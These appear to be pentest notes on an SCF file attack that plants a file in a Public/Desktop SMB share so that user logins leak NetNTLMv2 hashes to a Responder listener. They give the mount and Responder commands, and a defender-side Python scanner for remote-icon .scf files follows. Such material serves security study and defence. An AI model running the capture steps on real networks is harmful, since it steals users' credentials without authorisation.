SMB - SCF (Shell Command Files) - File Attacks (NetNTLMv2 hash (challenge) grab)


Create a file steal_hash.scf with the above in it. Add the correct attacker's IP address.

Next, upload the file into the Desktop folder within the Public folders.
The Public/Desktop folder is accessed every time any user logs in.
Therefore, when a user logs in, the icon is requested from our attacker's box,
the attacker's box issues a challenge, and the challenge response is then
returned to us with the NetNTLMv2 hash.

Upload the file like so...

mount -t cifs '// shares' -o username=amanda /mnt

If we have a readable and mountable SMB share that exposes the Public folder, then we
can add the file by combining the two attacks together.


Next, start Responder; only very basic settings are needed.

responder -I tun0

And now wait for a user to log in and we should see the NetNTLMv2 :-)
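
From the defender's side, a planted file of this kind can be found by scanning shares for .scf files whose icon reference points at a remote host. This is an added example, not part of the original notes; it assumes the icon reference sits in an IconFile= line, and the sample bytes and the 192.0.2.10 address are constructed.

```python
import os
import re
import sys

# Constructed sample (documentation address 192.0.2.10), not taken from the page.
SAMPLE = b"[Shell]\r\nIconFile=\\\\192.0.2.10\\share\\icon.ico\r\n"

# IconFile=<value>; a value starting with \\ or // is a UNC path to a remote host.
ICON_RE = re.compile(r"^\s*IconFile\s*=\s*(.+?)\s*$", re.I | re.M)
UNC_RE = re.compile(r"^[\\/]{2}([^\\/]+)[\\/]")


def decode(data: bytes) -> str:
    """Decode file bytes, honouring a UTF-16/UTF-8 BOM if present."""
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        return data.decode("utf-16", errors="replace")
    return data.decode("utf-8-sig", errors="replace")


def remote_icon_hosts(data: bytes) -> list[str]:
    """Return hosts referenced by UNC icon paths in one SCF file's contents."""
    hosts = []
    for value in ICON_RE.findall(decode(data)):
        m = UNC_RE.match(value.strip('"'))
        if m:
            hosts.append(m.group(1))
    return hosts


def scan(root: str) -> list[tuple[str, str]]:
    """Walk root and return (path, host) for every .scf with a remote icon."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".scf"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(65536)  # SCF files are tiny; cap the read
            except OSError:
                continue
            findings += [(path, h) for h in remote_icon_hosts(data)]
    return findings


if __name__ == "__main__":
    for path, host in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path}: icon loaded from remote host {host}")
```

Run it against a mounted copy of the share; any hit under Public/Desktop is worth triaging, and blocking outbound SMB at the perimeter keeps the challenge response from leaving the network.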

